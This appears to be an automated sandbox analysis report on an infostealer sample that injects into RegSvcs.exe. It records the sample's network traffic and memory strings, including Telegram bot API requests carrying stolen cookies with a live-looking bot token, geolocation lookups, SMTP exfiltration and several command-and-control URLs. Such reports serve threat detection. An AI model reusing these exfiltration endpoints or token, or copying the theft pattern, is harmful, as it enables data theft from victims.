              Source: global trafficHTTP traffic detected: POST /bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013849544&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5ed1ba658e39Host: api.telegram.orgContent-Length: 742Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2016:44:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013849544&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f05fec35142Host: api.telegram.orgContent-Length: 742Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewIP Address: 118.69.190.131 118.69.190.131
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49694 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49687 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49685 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49684 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49692 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49689 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49701 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 104.21.64.1:443
              Source: global trafficTCP traffic: 192.168.2.8:49722 -> 118.69.190.131:587
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49683 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49690 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:39:37%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/03/2025%20/%2016:44:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: mail.vvtrade.vn
              Source: unknownHTTP traffic detected: POST /bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013849544&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5ed1ba658e39Host: api.telegram.orgContent-Length: 742Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:51:07 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:51:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: RegSvcs.exe, 00000003.00000002.3307241932.0000000000434000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003440000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003450000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003450000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3307241932.0000000000434000.00000040.80000000.00040000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: RegSvcs.exe, 00000006.00000002.3308619299.0000000000EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsG
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003440000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.vvtrade.vn
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003440000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.vvtrade.vnd
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003450000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3307267063.0000000000435000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7323823089:AAFBRsTW94zIpSoDS8yfGsotlQLqF2I6TU0/sendDocument?chat_id=5013
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: RegSvcs.exe, 00000003.00000002.3309658145.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBDr
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: RegSvcs.exe, 00000003.00000002.3312006206.000000000456F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3312006206.0000000004535000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: RegSvcs.exe, 00000006.00000002.3311829142.0000000003DA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3311829142.0000000003DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: RegSvcs.exe, 00000003.00000002.3309658145.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: Glagolitic.exe, 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3307241932.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: RegSvcs.exe, 00000006.00000002.3309591385.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: RegSvcs.exe, 00000003.00000002.3309658145.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003338000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
